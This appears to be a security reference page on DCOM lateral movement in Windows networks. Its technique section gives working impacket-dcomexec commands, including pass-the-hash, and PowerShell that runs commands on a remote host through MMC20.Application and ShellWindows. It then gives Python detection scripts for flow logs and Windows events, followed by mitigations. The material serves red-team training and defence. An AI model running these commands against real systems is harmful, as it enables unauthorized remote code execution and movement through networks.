# DCOM

## Overview

Distributed Component Object Model (DCOM) allows COM objects to be instantiated and called remotely over RPC (TCP 135 plus dynamic high ports). Several COM objects — including MMC20.Application, ShellWindows, and ShellBrowserWindow — expose methods that can execute arbitrary commands. DCOM lateral movement is less common than PsExec or WMI, which makes it less likely to be monitored.
## ATT&CK Mapping

- Tactic: TA0008 - Lateral Movement
- Technique: T1021.003 - Remote Services: Distributed Component Object Model
## Prerequisites

- Valid credentials with local admin rights on the target
- Network access to RPC (TCP 135 + dynamic high ports)
- DCOM enabled on the target (enabled by default)
## Techniques

### Impacket DCOMExec

```bash
# Impacket dcomexec
# https://github.com/fortra/impacket
# Interactive shell (default: ShellWindows)
impacket-dcomexec '<domain>/<user>:<password>@<target>'
# Execute a specific command
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami'
# Pass-the-hash
impacket-dcomexec '<domain>/<user>@<target>' -hashes ':<NThash>'
# Specify COM object (default is ShellWindows)
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object MMC20
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object ShellWindows
impacket-dcomexec '<domain>/<user>:<password>@<target>' 'whoami' -object ShellBrowserWindow
```
### PowerShell DCOM Execution (from Windows)

```powershell
# MMC20.Application — ExecuteShellCommand method
# Signature: ExecuteShellCommand(Command, Directory, Parameters, WindowState)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "<target>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\Users\Public\output.txt", "7")

# ShellWindows — instantiated by CLSID, then ShellExecute on the Application object
# Signature: ShellExecute(File, Arguments, Directory, Operation, Show)
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "<target>"))
$com.item().Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\Users\Public\output.txt", "C:\Windows\System32", $null, 0)
```
## Comparison with Other Methods

| Feature | DCOM | PsExec | WMIExec |
|---|---|---|---|
| Protocol | RPC (135) | SMB (445) | RPC (135) |
| Runs as | Authenticated user | SYSTEM | Authenticated user |
| File write | No | Yes (service binary) | No |
| Detection | Low | High | Low-Medium |
| Reliability | Medium | High | High |
## Detection Methods

### Network-Based Detection

- DCOM/RPC traffic between workstations (TCP 135 + dynamic ports)
- Unusual COM object instantiation over the network
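A flow-log check for the network signal described above, as an added example that is not part of the original page. It assumes flow records in the shape `timestamp,src_ip,dst_ip,dst_port` (Zeek conn.log or a firewall export reduced to those columns) and a workstation subnet that is an assumption for the demonstration; the sample flows are constructed. A DCOM call first hits the endpoint mapper on TCP 135 and then the server's dynamic RPC port, so a workstation-to-workstation 135 hit that is followed within seconds by a high-port connection between the same pair is rated higher than a lone 135 hit.

```python
"""Flag workstation-to-workstation DCOM/RPC activity in flow logs.

Added example, not from the original page. The subnet and sample flows
below are constructed for the demonstration.
"""
import ipaddress
from datetime import datetime, timedelta

# Constructed assumption: subnets that contain only workstations. Workstations
# have no routine reason to open RPC endpoint-mapper sessions to each other.
WORKSTATION_SUBNETS = [ipaddress.ip_network("10.10.0.0/16")]

EPMAP_PORT = 135                       # RPC endpoint mapper
DYNAMIC_PORT_RANGE = range(49152, 65536)  # dynamic RPC ports on modern Windows
FOLLOW_UP_WINDOW = timedelta(seconds=10)  # 135 -> dynamic port normally takes well under this

# Constructed sample flows: "timestamp,src_ip,dst_ip,dst_port"
SAMPLE_FLOWS = """\
2024-05-01T09:00:01,10.10.1.15,10.10.1.20,135
2024-05-01T09:00:01,10.10.1.15,10.10.1.20,49667
2024-05-01T09:05:00,10.10.1.15,10.20.0.5,135
2024-05-01T09:05:00,10.10.1.15,10.20.0.5,49700
2024-05-01T09:07:00,10.10.1.30,10.10.1.40,135
2024-05-01T09:30:00,10.10.1.30,10.10.1.40,49800
"""


def parse_flows(text):
    """Parse CSV flow lines into (timestamp, src, dst, dst_port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split(",")
        flows.append((datetime.fromisoformat(ts),
                      ipaddress.ip_address(src),
                      ipaddress.ip_address(dst),
                      int(port)))
    return flows


def is_workstation(ip):
    return any(ip in net for net in WORKSTATION_SUBNETS)


def find_dcom_indicators(flows):
    """Return one indicator per workstation->workstation TCP 135 flow.

    Confidence is "high" when the same pair also talks on a dynamic RPC port
    within FOLLOW_UP_WINDOW (the endpoint-mapper-then-dynamic-port pattern),
    otherwise "medium" (endpoint mapper contact only).
    """
    flows = sorted(flows, key=lambda f: f[0])
    indicators = []
    for ts, src, dst, port in flows:
        if port != EPMAP_PORT or not (is_workstation(src) and is_workstation(dst)):
            continue
        followed = any(
            s == src and d == dst and p in DYNAMIC_PORT_RANGE
            and ts <= t <= ts + FOLLOW_UP_WINDOW
            for t, s, d, p in flows
        )
        indicators.append({
            "src": str(src), "dst": str(dst), "time": ts.isoformat(),
            "confidence": "high" if followed else "medium",
        })
    return indicators


if __name__ == "__main__":
    for hit in find_dcom_indicators(parse_flows(SAMPLE_FLOWS)):
        print(hit)
```

The third and fourth sample flows go to a host outside the workstation range and are ignored; the last pair is a 135 contact with no timely follow-up, so it is reported at medium confidence only. Tune the subnet list and window to the environment before relying on the rule.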
### Host-Based Detection

- Event ID 4624 (Type 3) — network logon via DCOM
- Sysmon Event ID 1 — mmc.exe or explorer.exe spawning child processes from network logon context
- Monitor for DCOM object creation events (COM+ Event ID 4688)
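A host-side correlation of the two event sources listed above, as an added example that is not part of the original page. It joins Security Event ID 4624 logons with Sysmon Event ID 1 process creations on the logon ID, and reports children of `mmc.exe` or `explorer.exe` whose logon is a Type 3 (network) logon. The event records are constructed dicts using the real field names of those events; the hex logon IDs, user names and IP addresses are sample values.

```python
"""Correlate 4624 Type 3 logons with Sysmon EID 1 to spot COM server
processes spawning children under a network logon.

Added example, not from the original page. Events below are constructed
in the shape of the real event fields.
"""

COM_SERVER_IMAGES = {"mmc.exe", "explorer.exe"}
NETWORK_LOGON_TYPE = "3"

# Constructed sample events. Field names follow the Security 4624 and
# Sysmon Event ID 1 schemas; the values are made up for the demonstration.
SAMPLE_EVENTS = [
    {"Source": "Security", "EventID": 4624, "LogonType": "3",
     "TargetUserName": "alice", "TargetLogonId": "0x5A3C12", "IpAddress": "10.10.1.15"},
    {"Source": "Security", "EventID": 4624, "LogonType": "2",
     "TargetUserName": "bob", "TargetLogonId": "0x3E7B0", "IpAddress": "-"},
    # COM activation of mmc.exe by the DCOM launcher: parent is svchost, not flagged
    {"Source": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mmc.exe", "LogonId": "0x5A3C12",
     "CommandLine": "mmc.exe -Embedding"},
    # mmc.exe spawning cmd.exe under alice's network logon: flagged
    {"Source": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\System32\mmc.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "LogonId": "0x5a3c12",
     "CommandLine": r"cmd.exe /c whoami > C:\Users\Public\output.txt"},
    # explorer.exe spawning cmd.exe under bob's interactive logon: normal, not flagged
    {"Source": "Sysmon", "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "LogonId": "0x3E7B0",
     "CommandLine": "cmd.exe"},
]


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def norm_logon_id(value):
    """Logon IDs are hex strings; normalise case and leading zeros."""
    return hex(int(value, 16))


def network_logons(events):
    """Map normalised LogonId -> (user, source IP) for Type 3 logons."""
    return {
        norm_logon_id(e["TargetLogonId"]): (e["TargetUserName"], e["IpAddress"])
        for e in events
        if e["Source"] == "Security" and e["EventID"] == 4624
        and e["LogonType"] == NETWORK_LOGON_TYPE
    }


def find_dcom_children(events):
    """Return children of mmc.exe/explorer.exe created under a network logon,
    enriched with the user and source IP from the matching 4624."""
    logons = network_logons(events)
    alerts = []
    for e in events:
        if e["Source"] != "Sysmon" or e["EventID"] != 1:
            continue
        parent = basename(e["ParentImage"])
        if parent not in COM_SERVER_IMAGES:
            continue
        logon_id = norm_logon_id(e["LogonId"])
        if logon_id not in logons:
            continue
        user, ip = logons[logon_id]
        alerts.append({"parent": parent, "child": basename(e["Image"]),
                       "user": user, "source_ip": ip,
                       "command": e["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in find_dcom_children(SAMPLE_EVENTS):
        print(alert)
```

The logon-ID join is strongest for MMC20.Application, where `mmc.exe` is started for the remote caller and carries the network logon. The ShellWindows and ShellBrowserWindow objects drive the interactive user's already-running `explorer.exe`, so the child inherits that user's interactive logon ID and will not match a Type 3 logon; for those, pair the timing of a Type 3 logon from the same source with `explorer.exe` children instead.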
## Mitigation Strategies

- Restrict DCOM — disable remote DCOM access where not required via dcomcnfg.exe or GPO
- Firewall rules — block RPC (TCP 135) between workstations
- Monitor DCOM activity — log and alert on remote COM object instantiation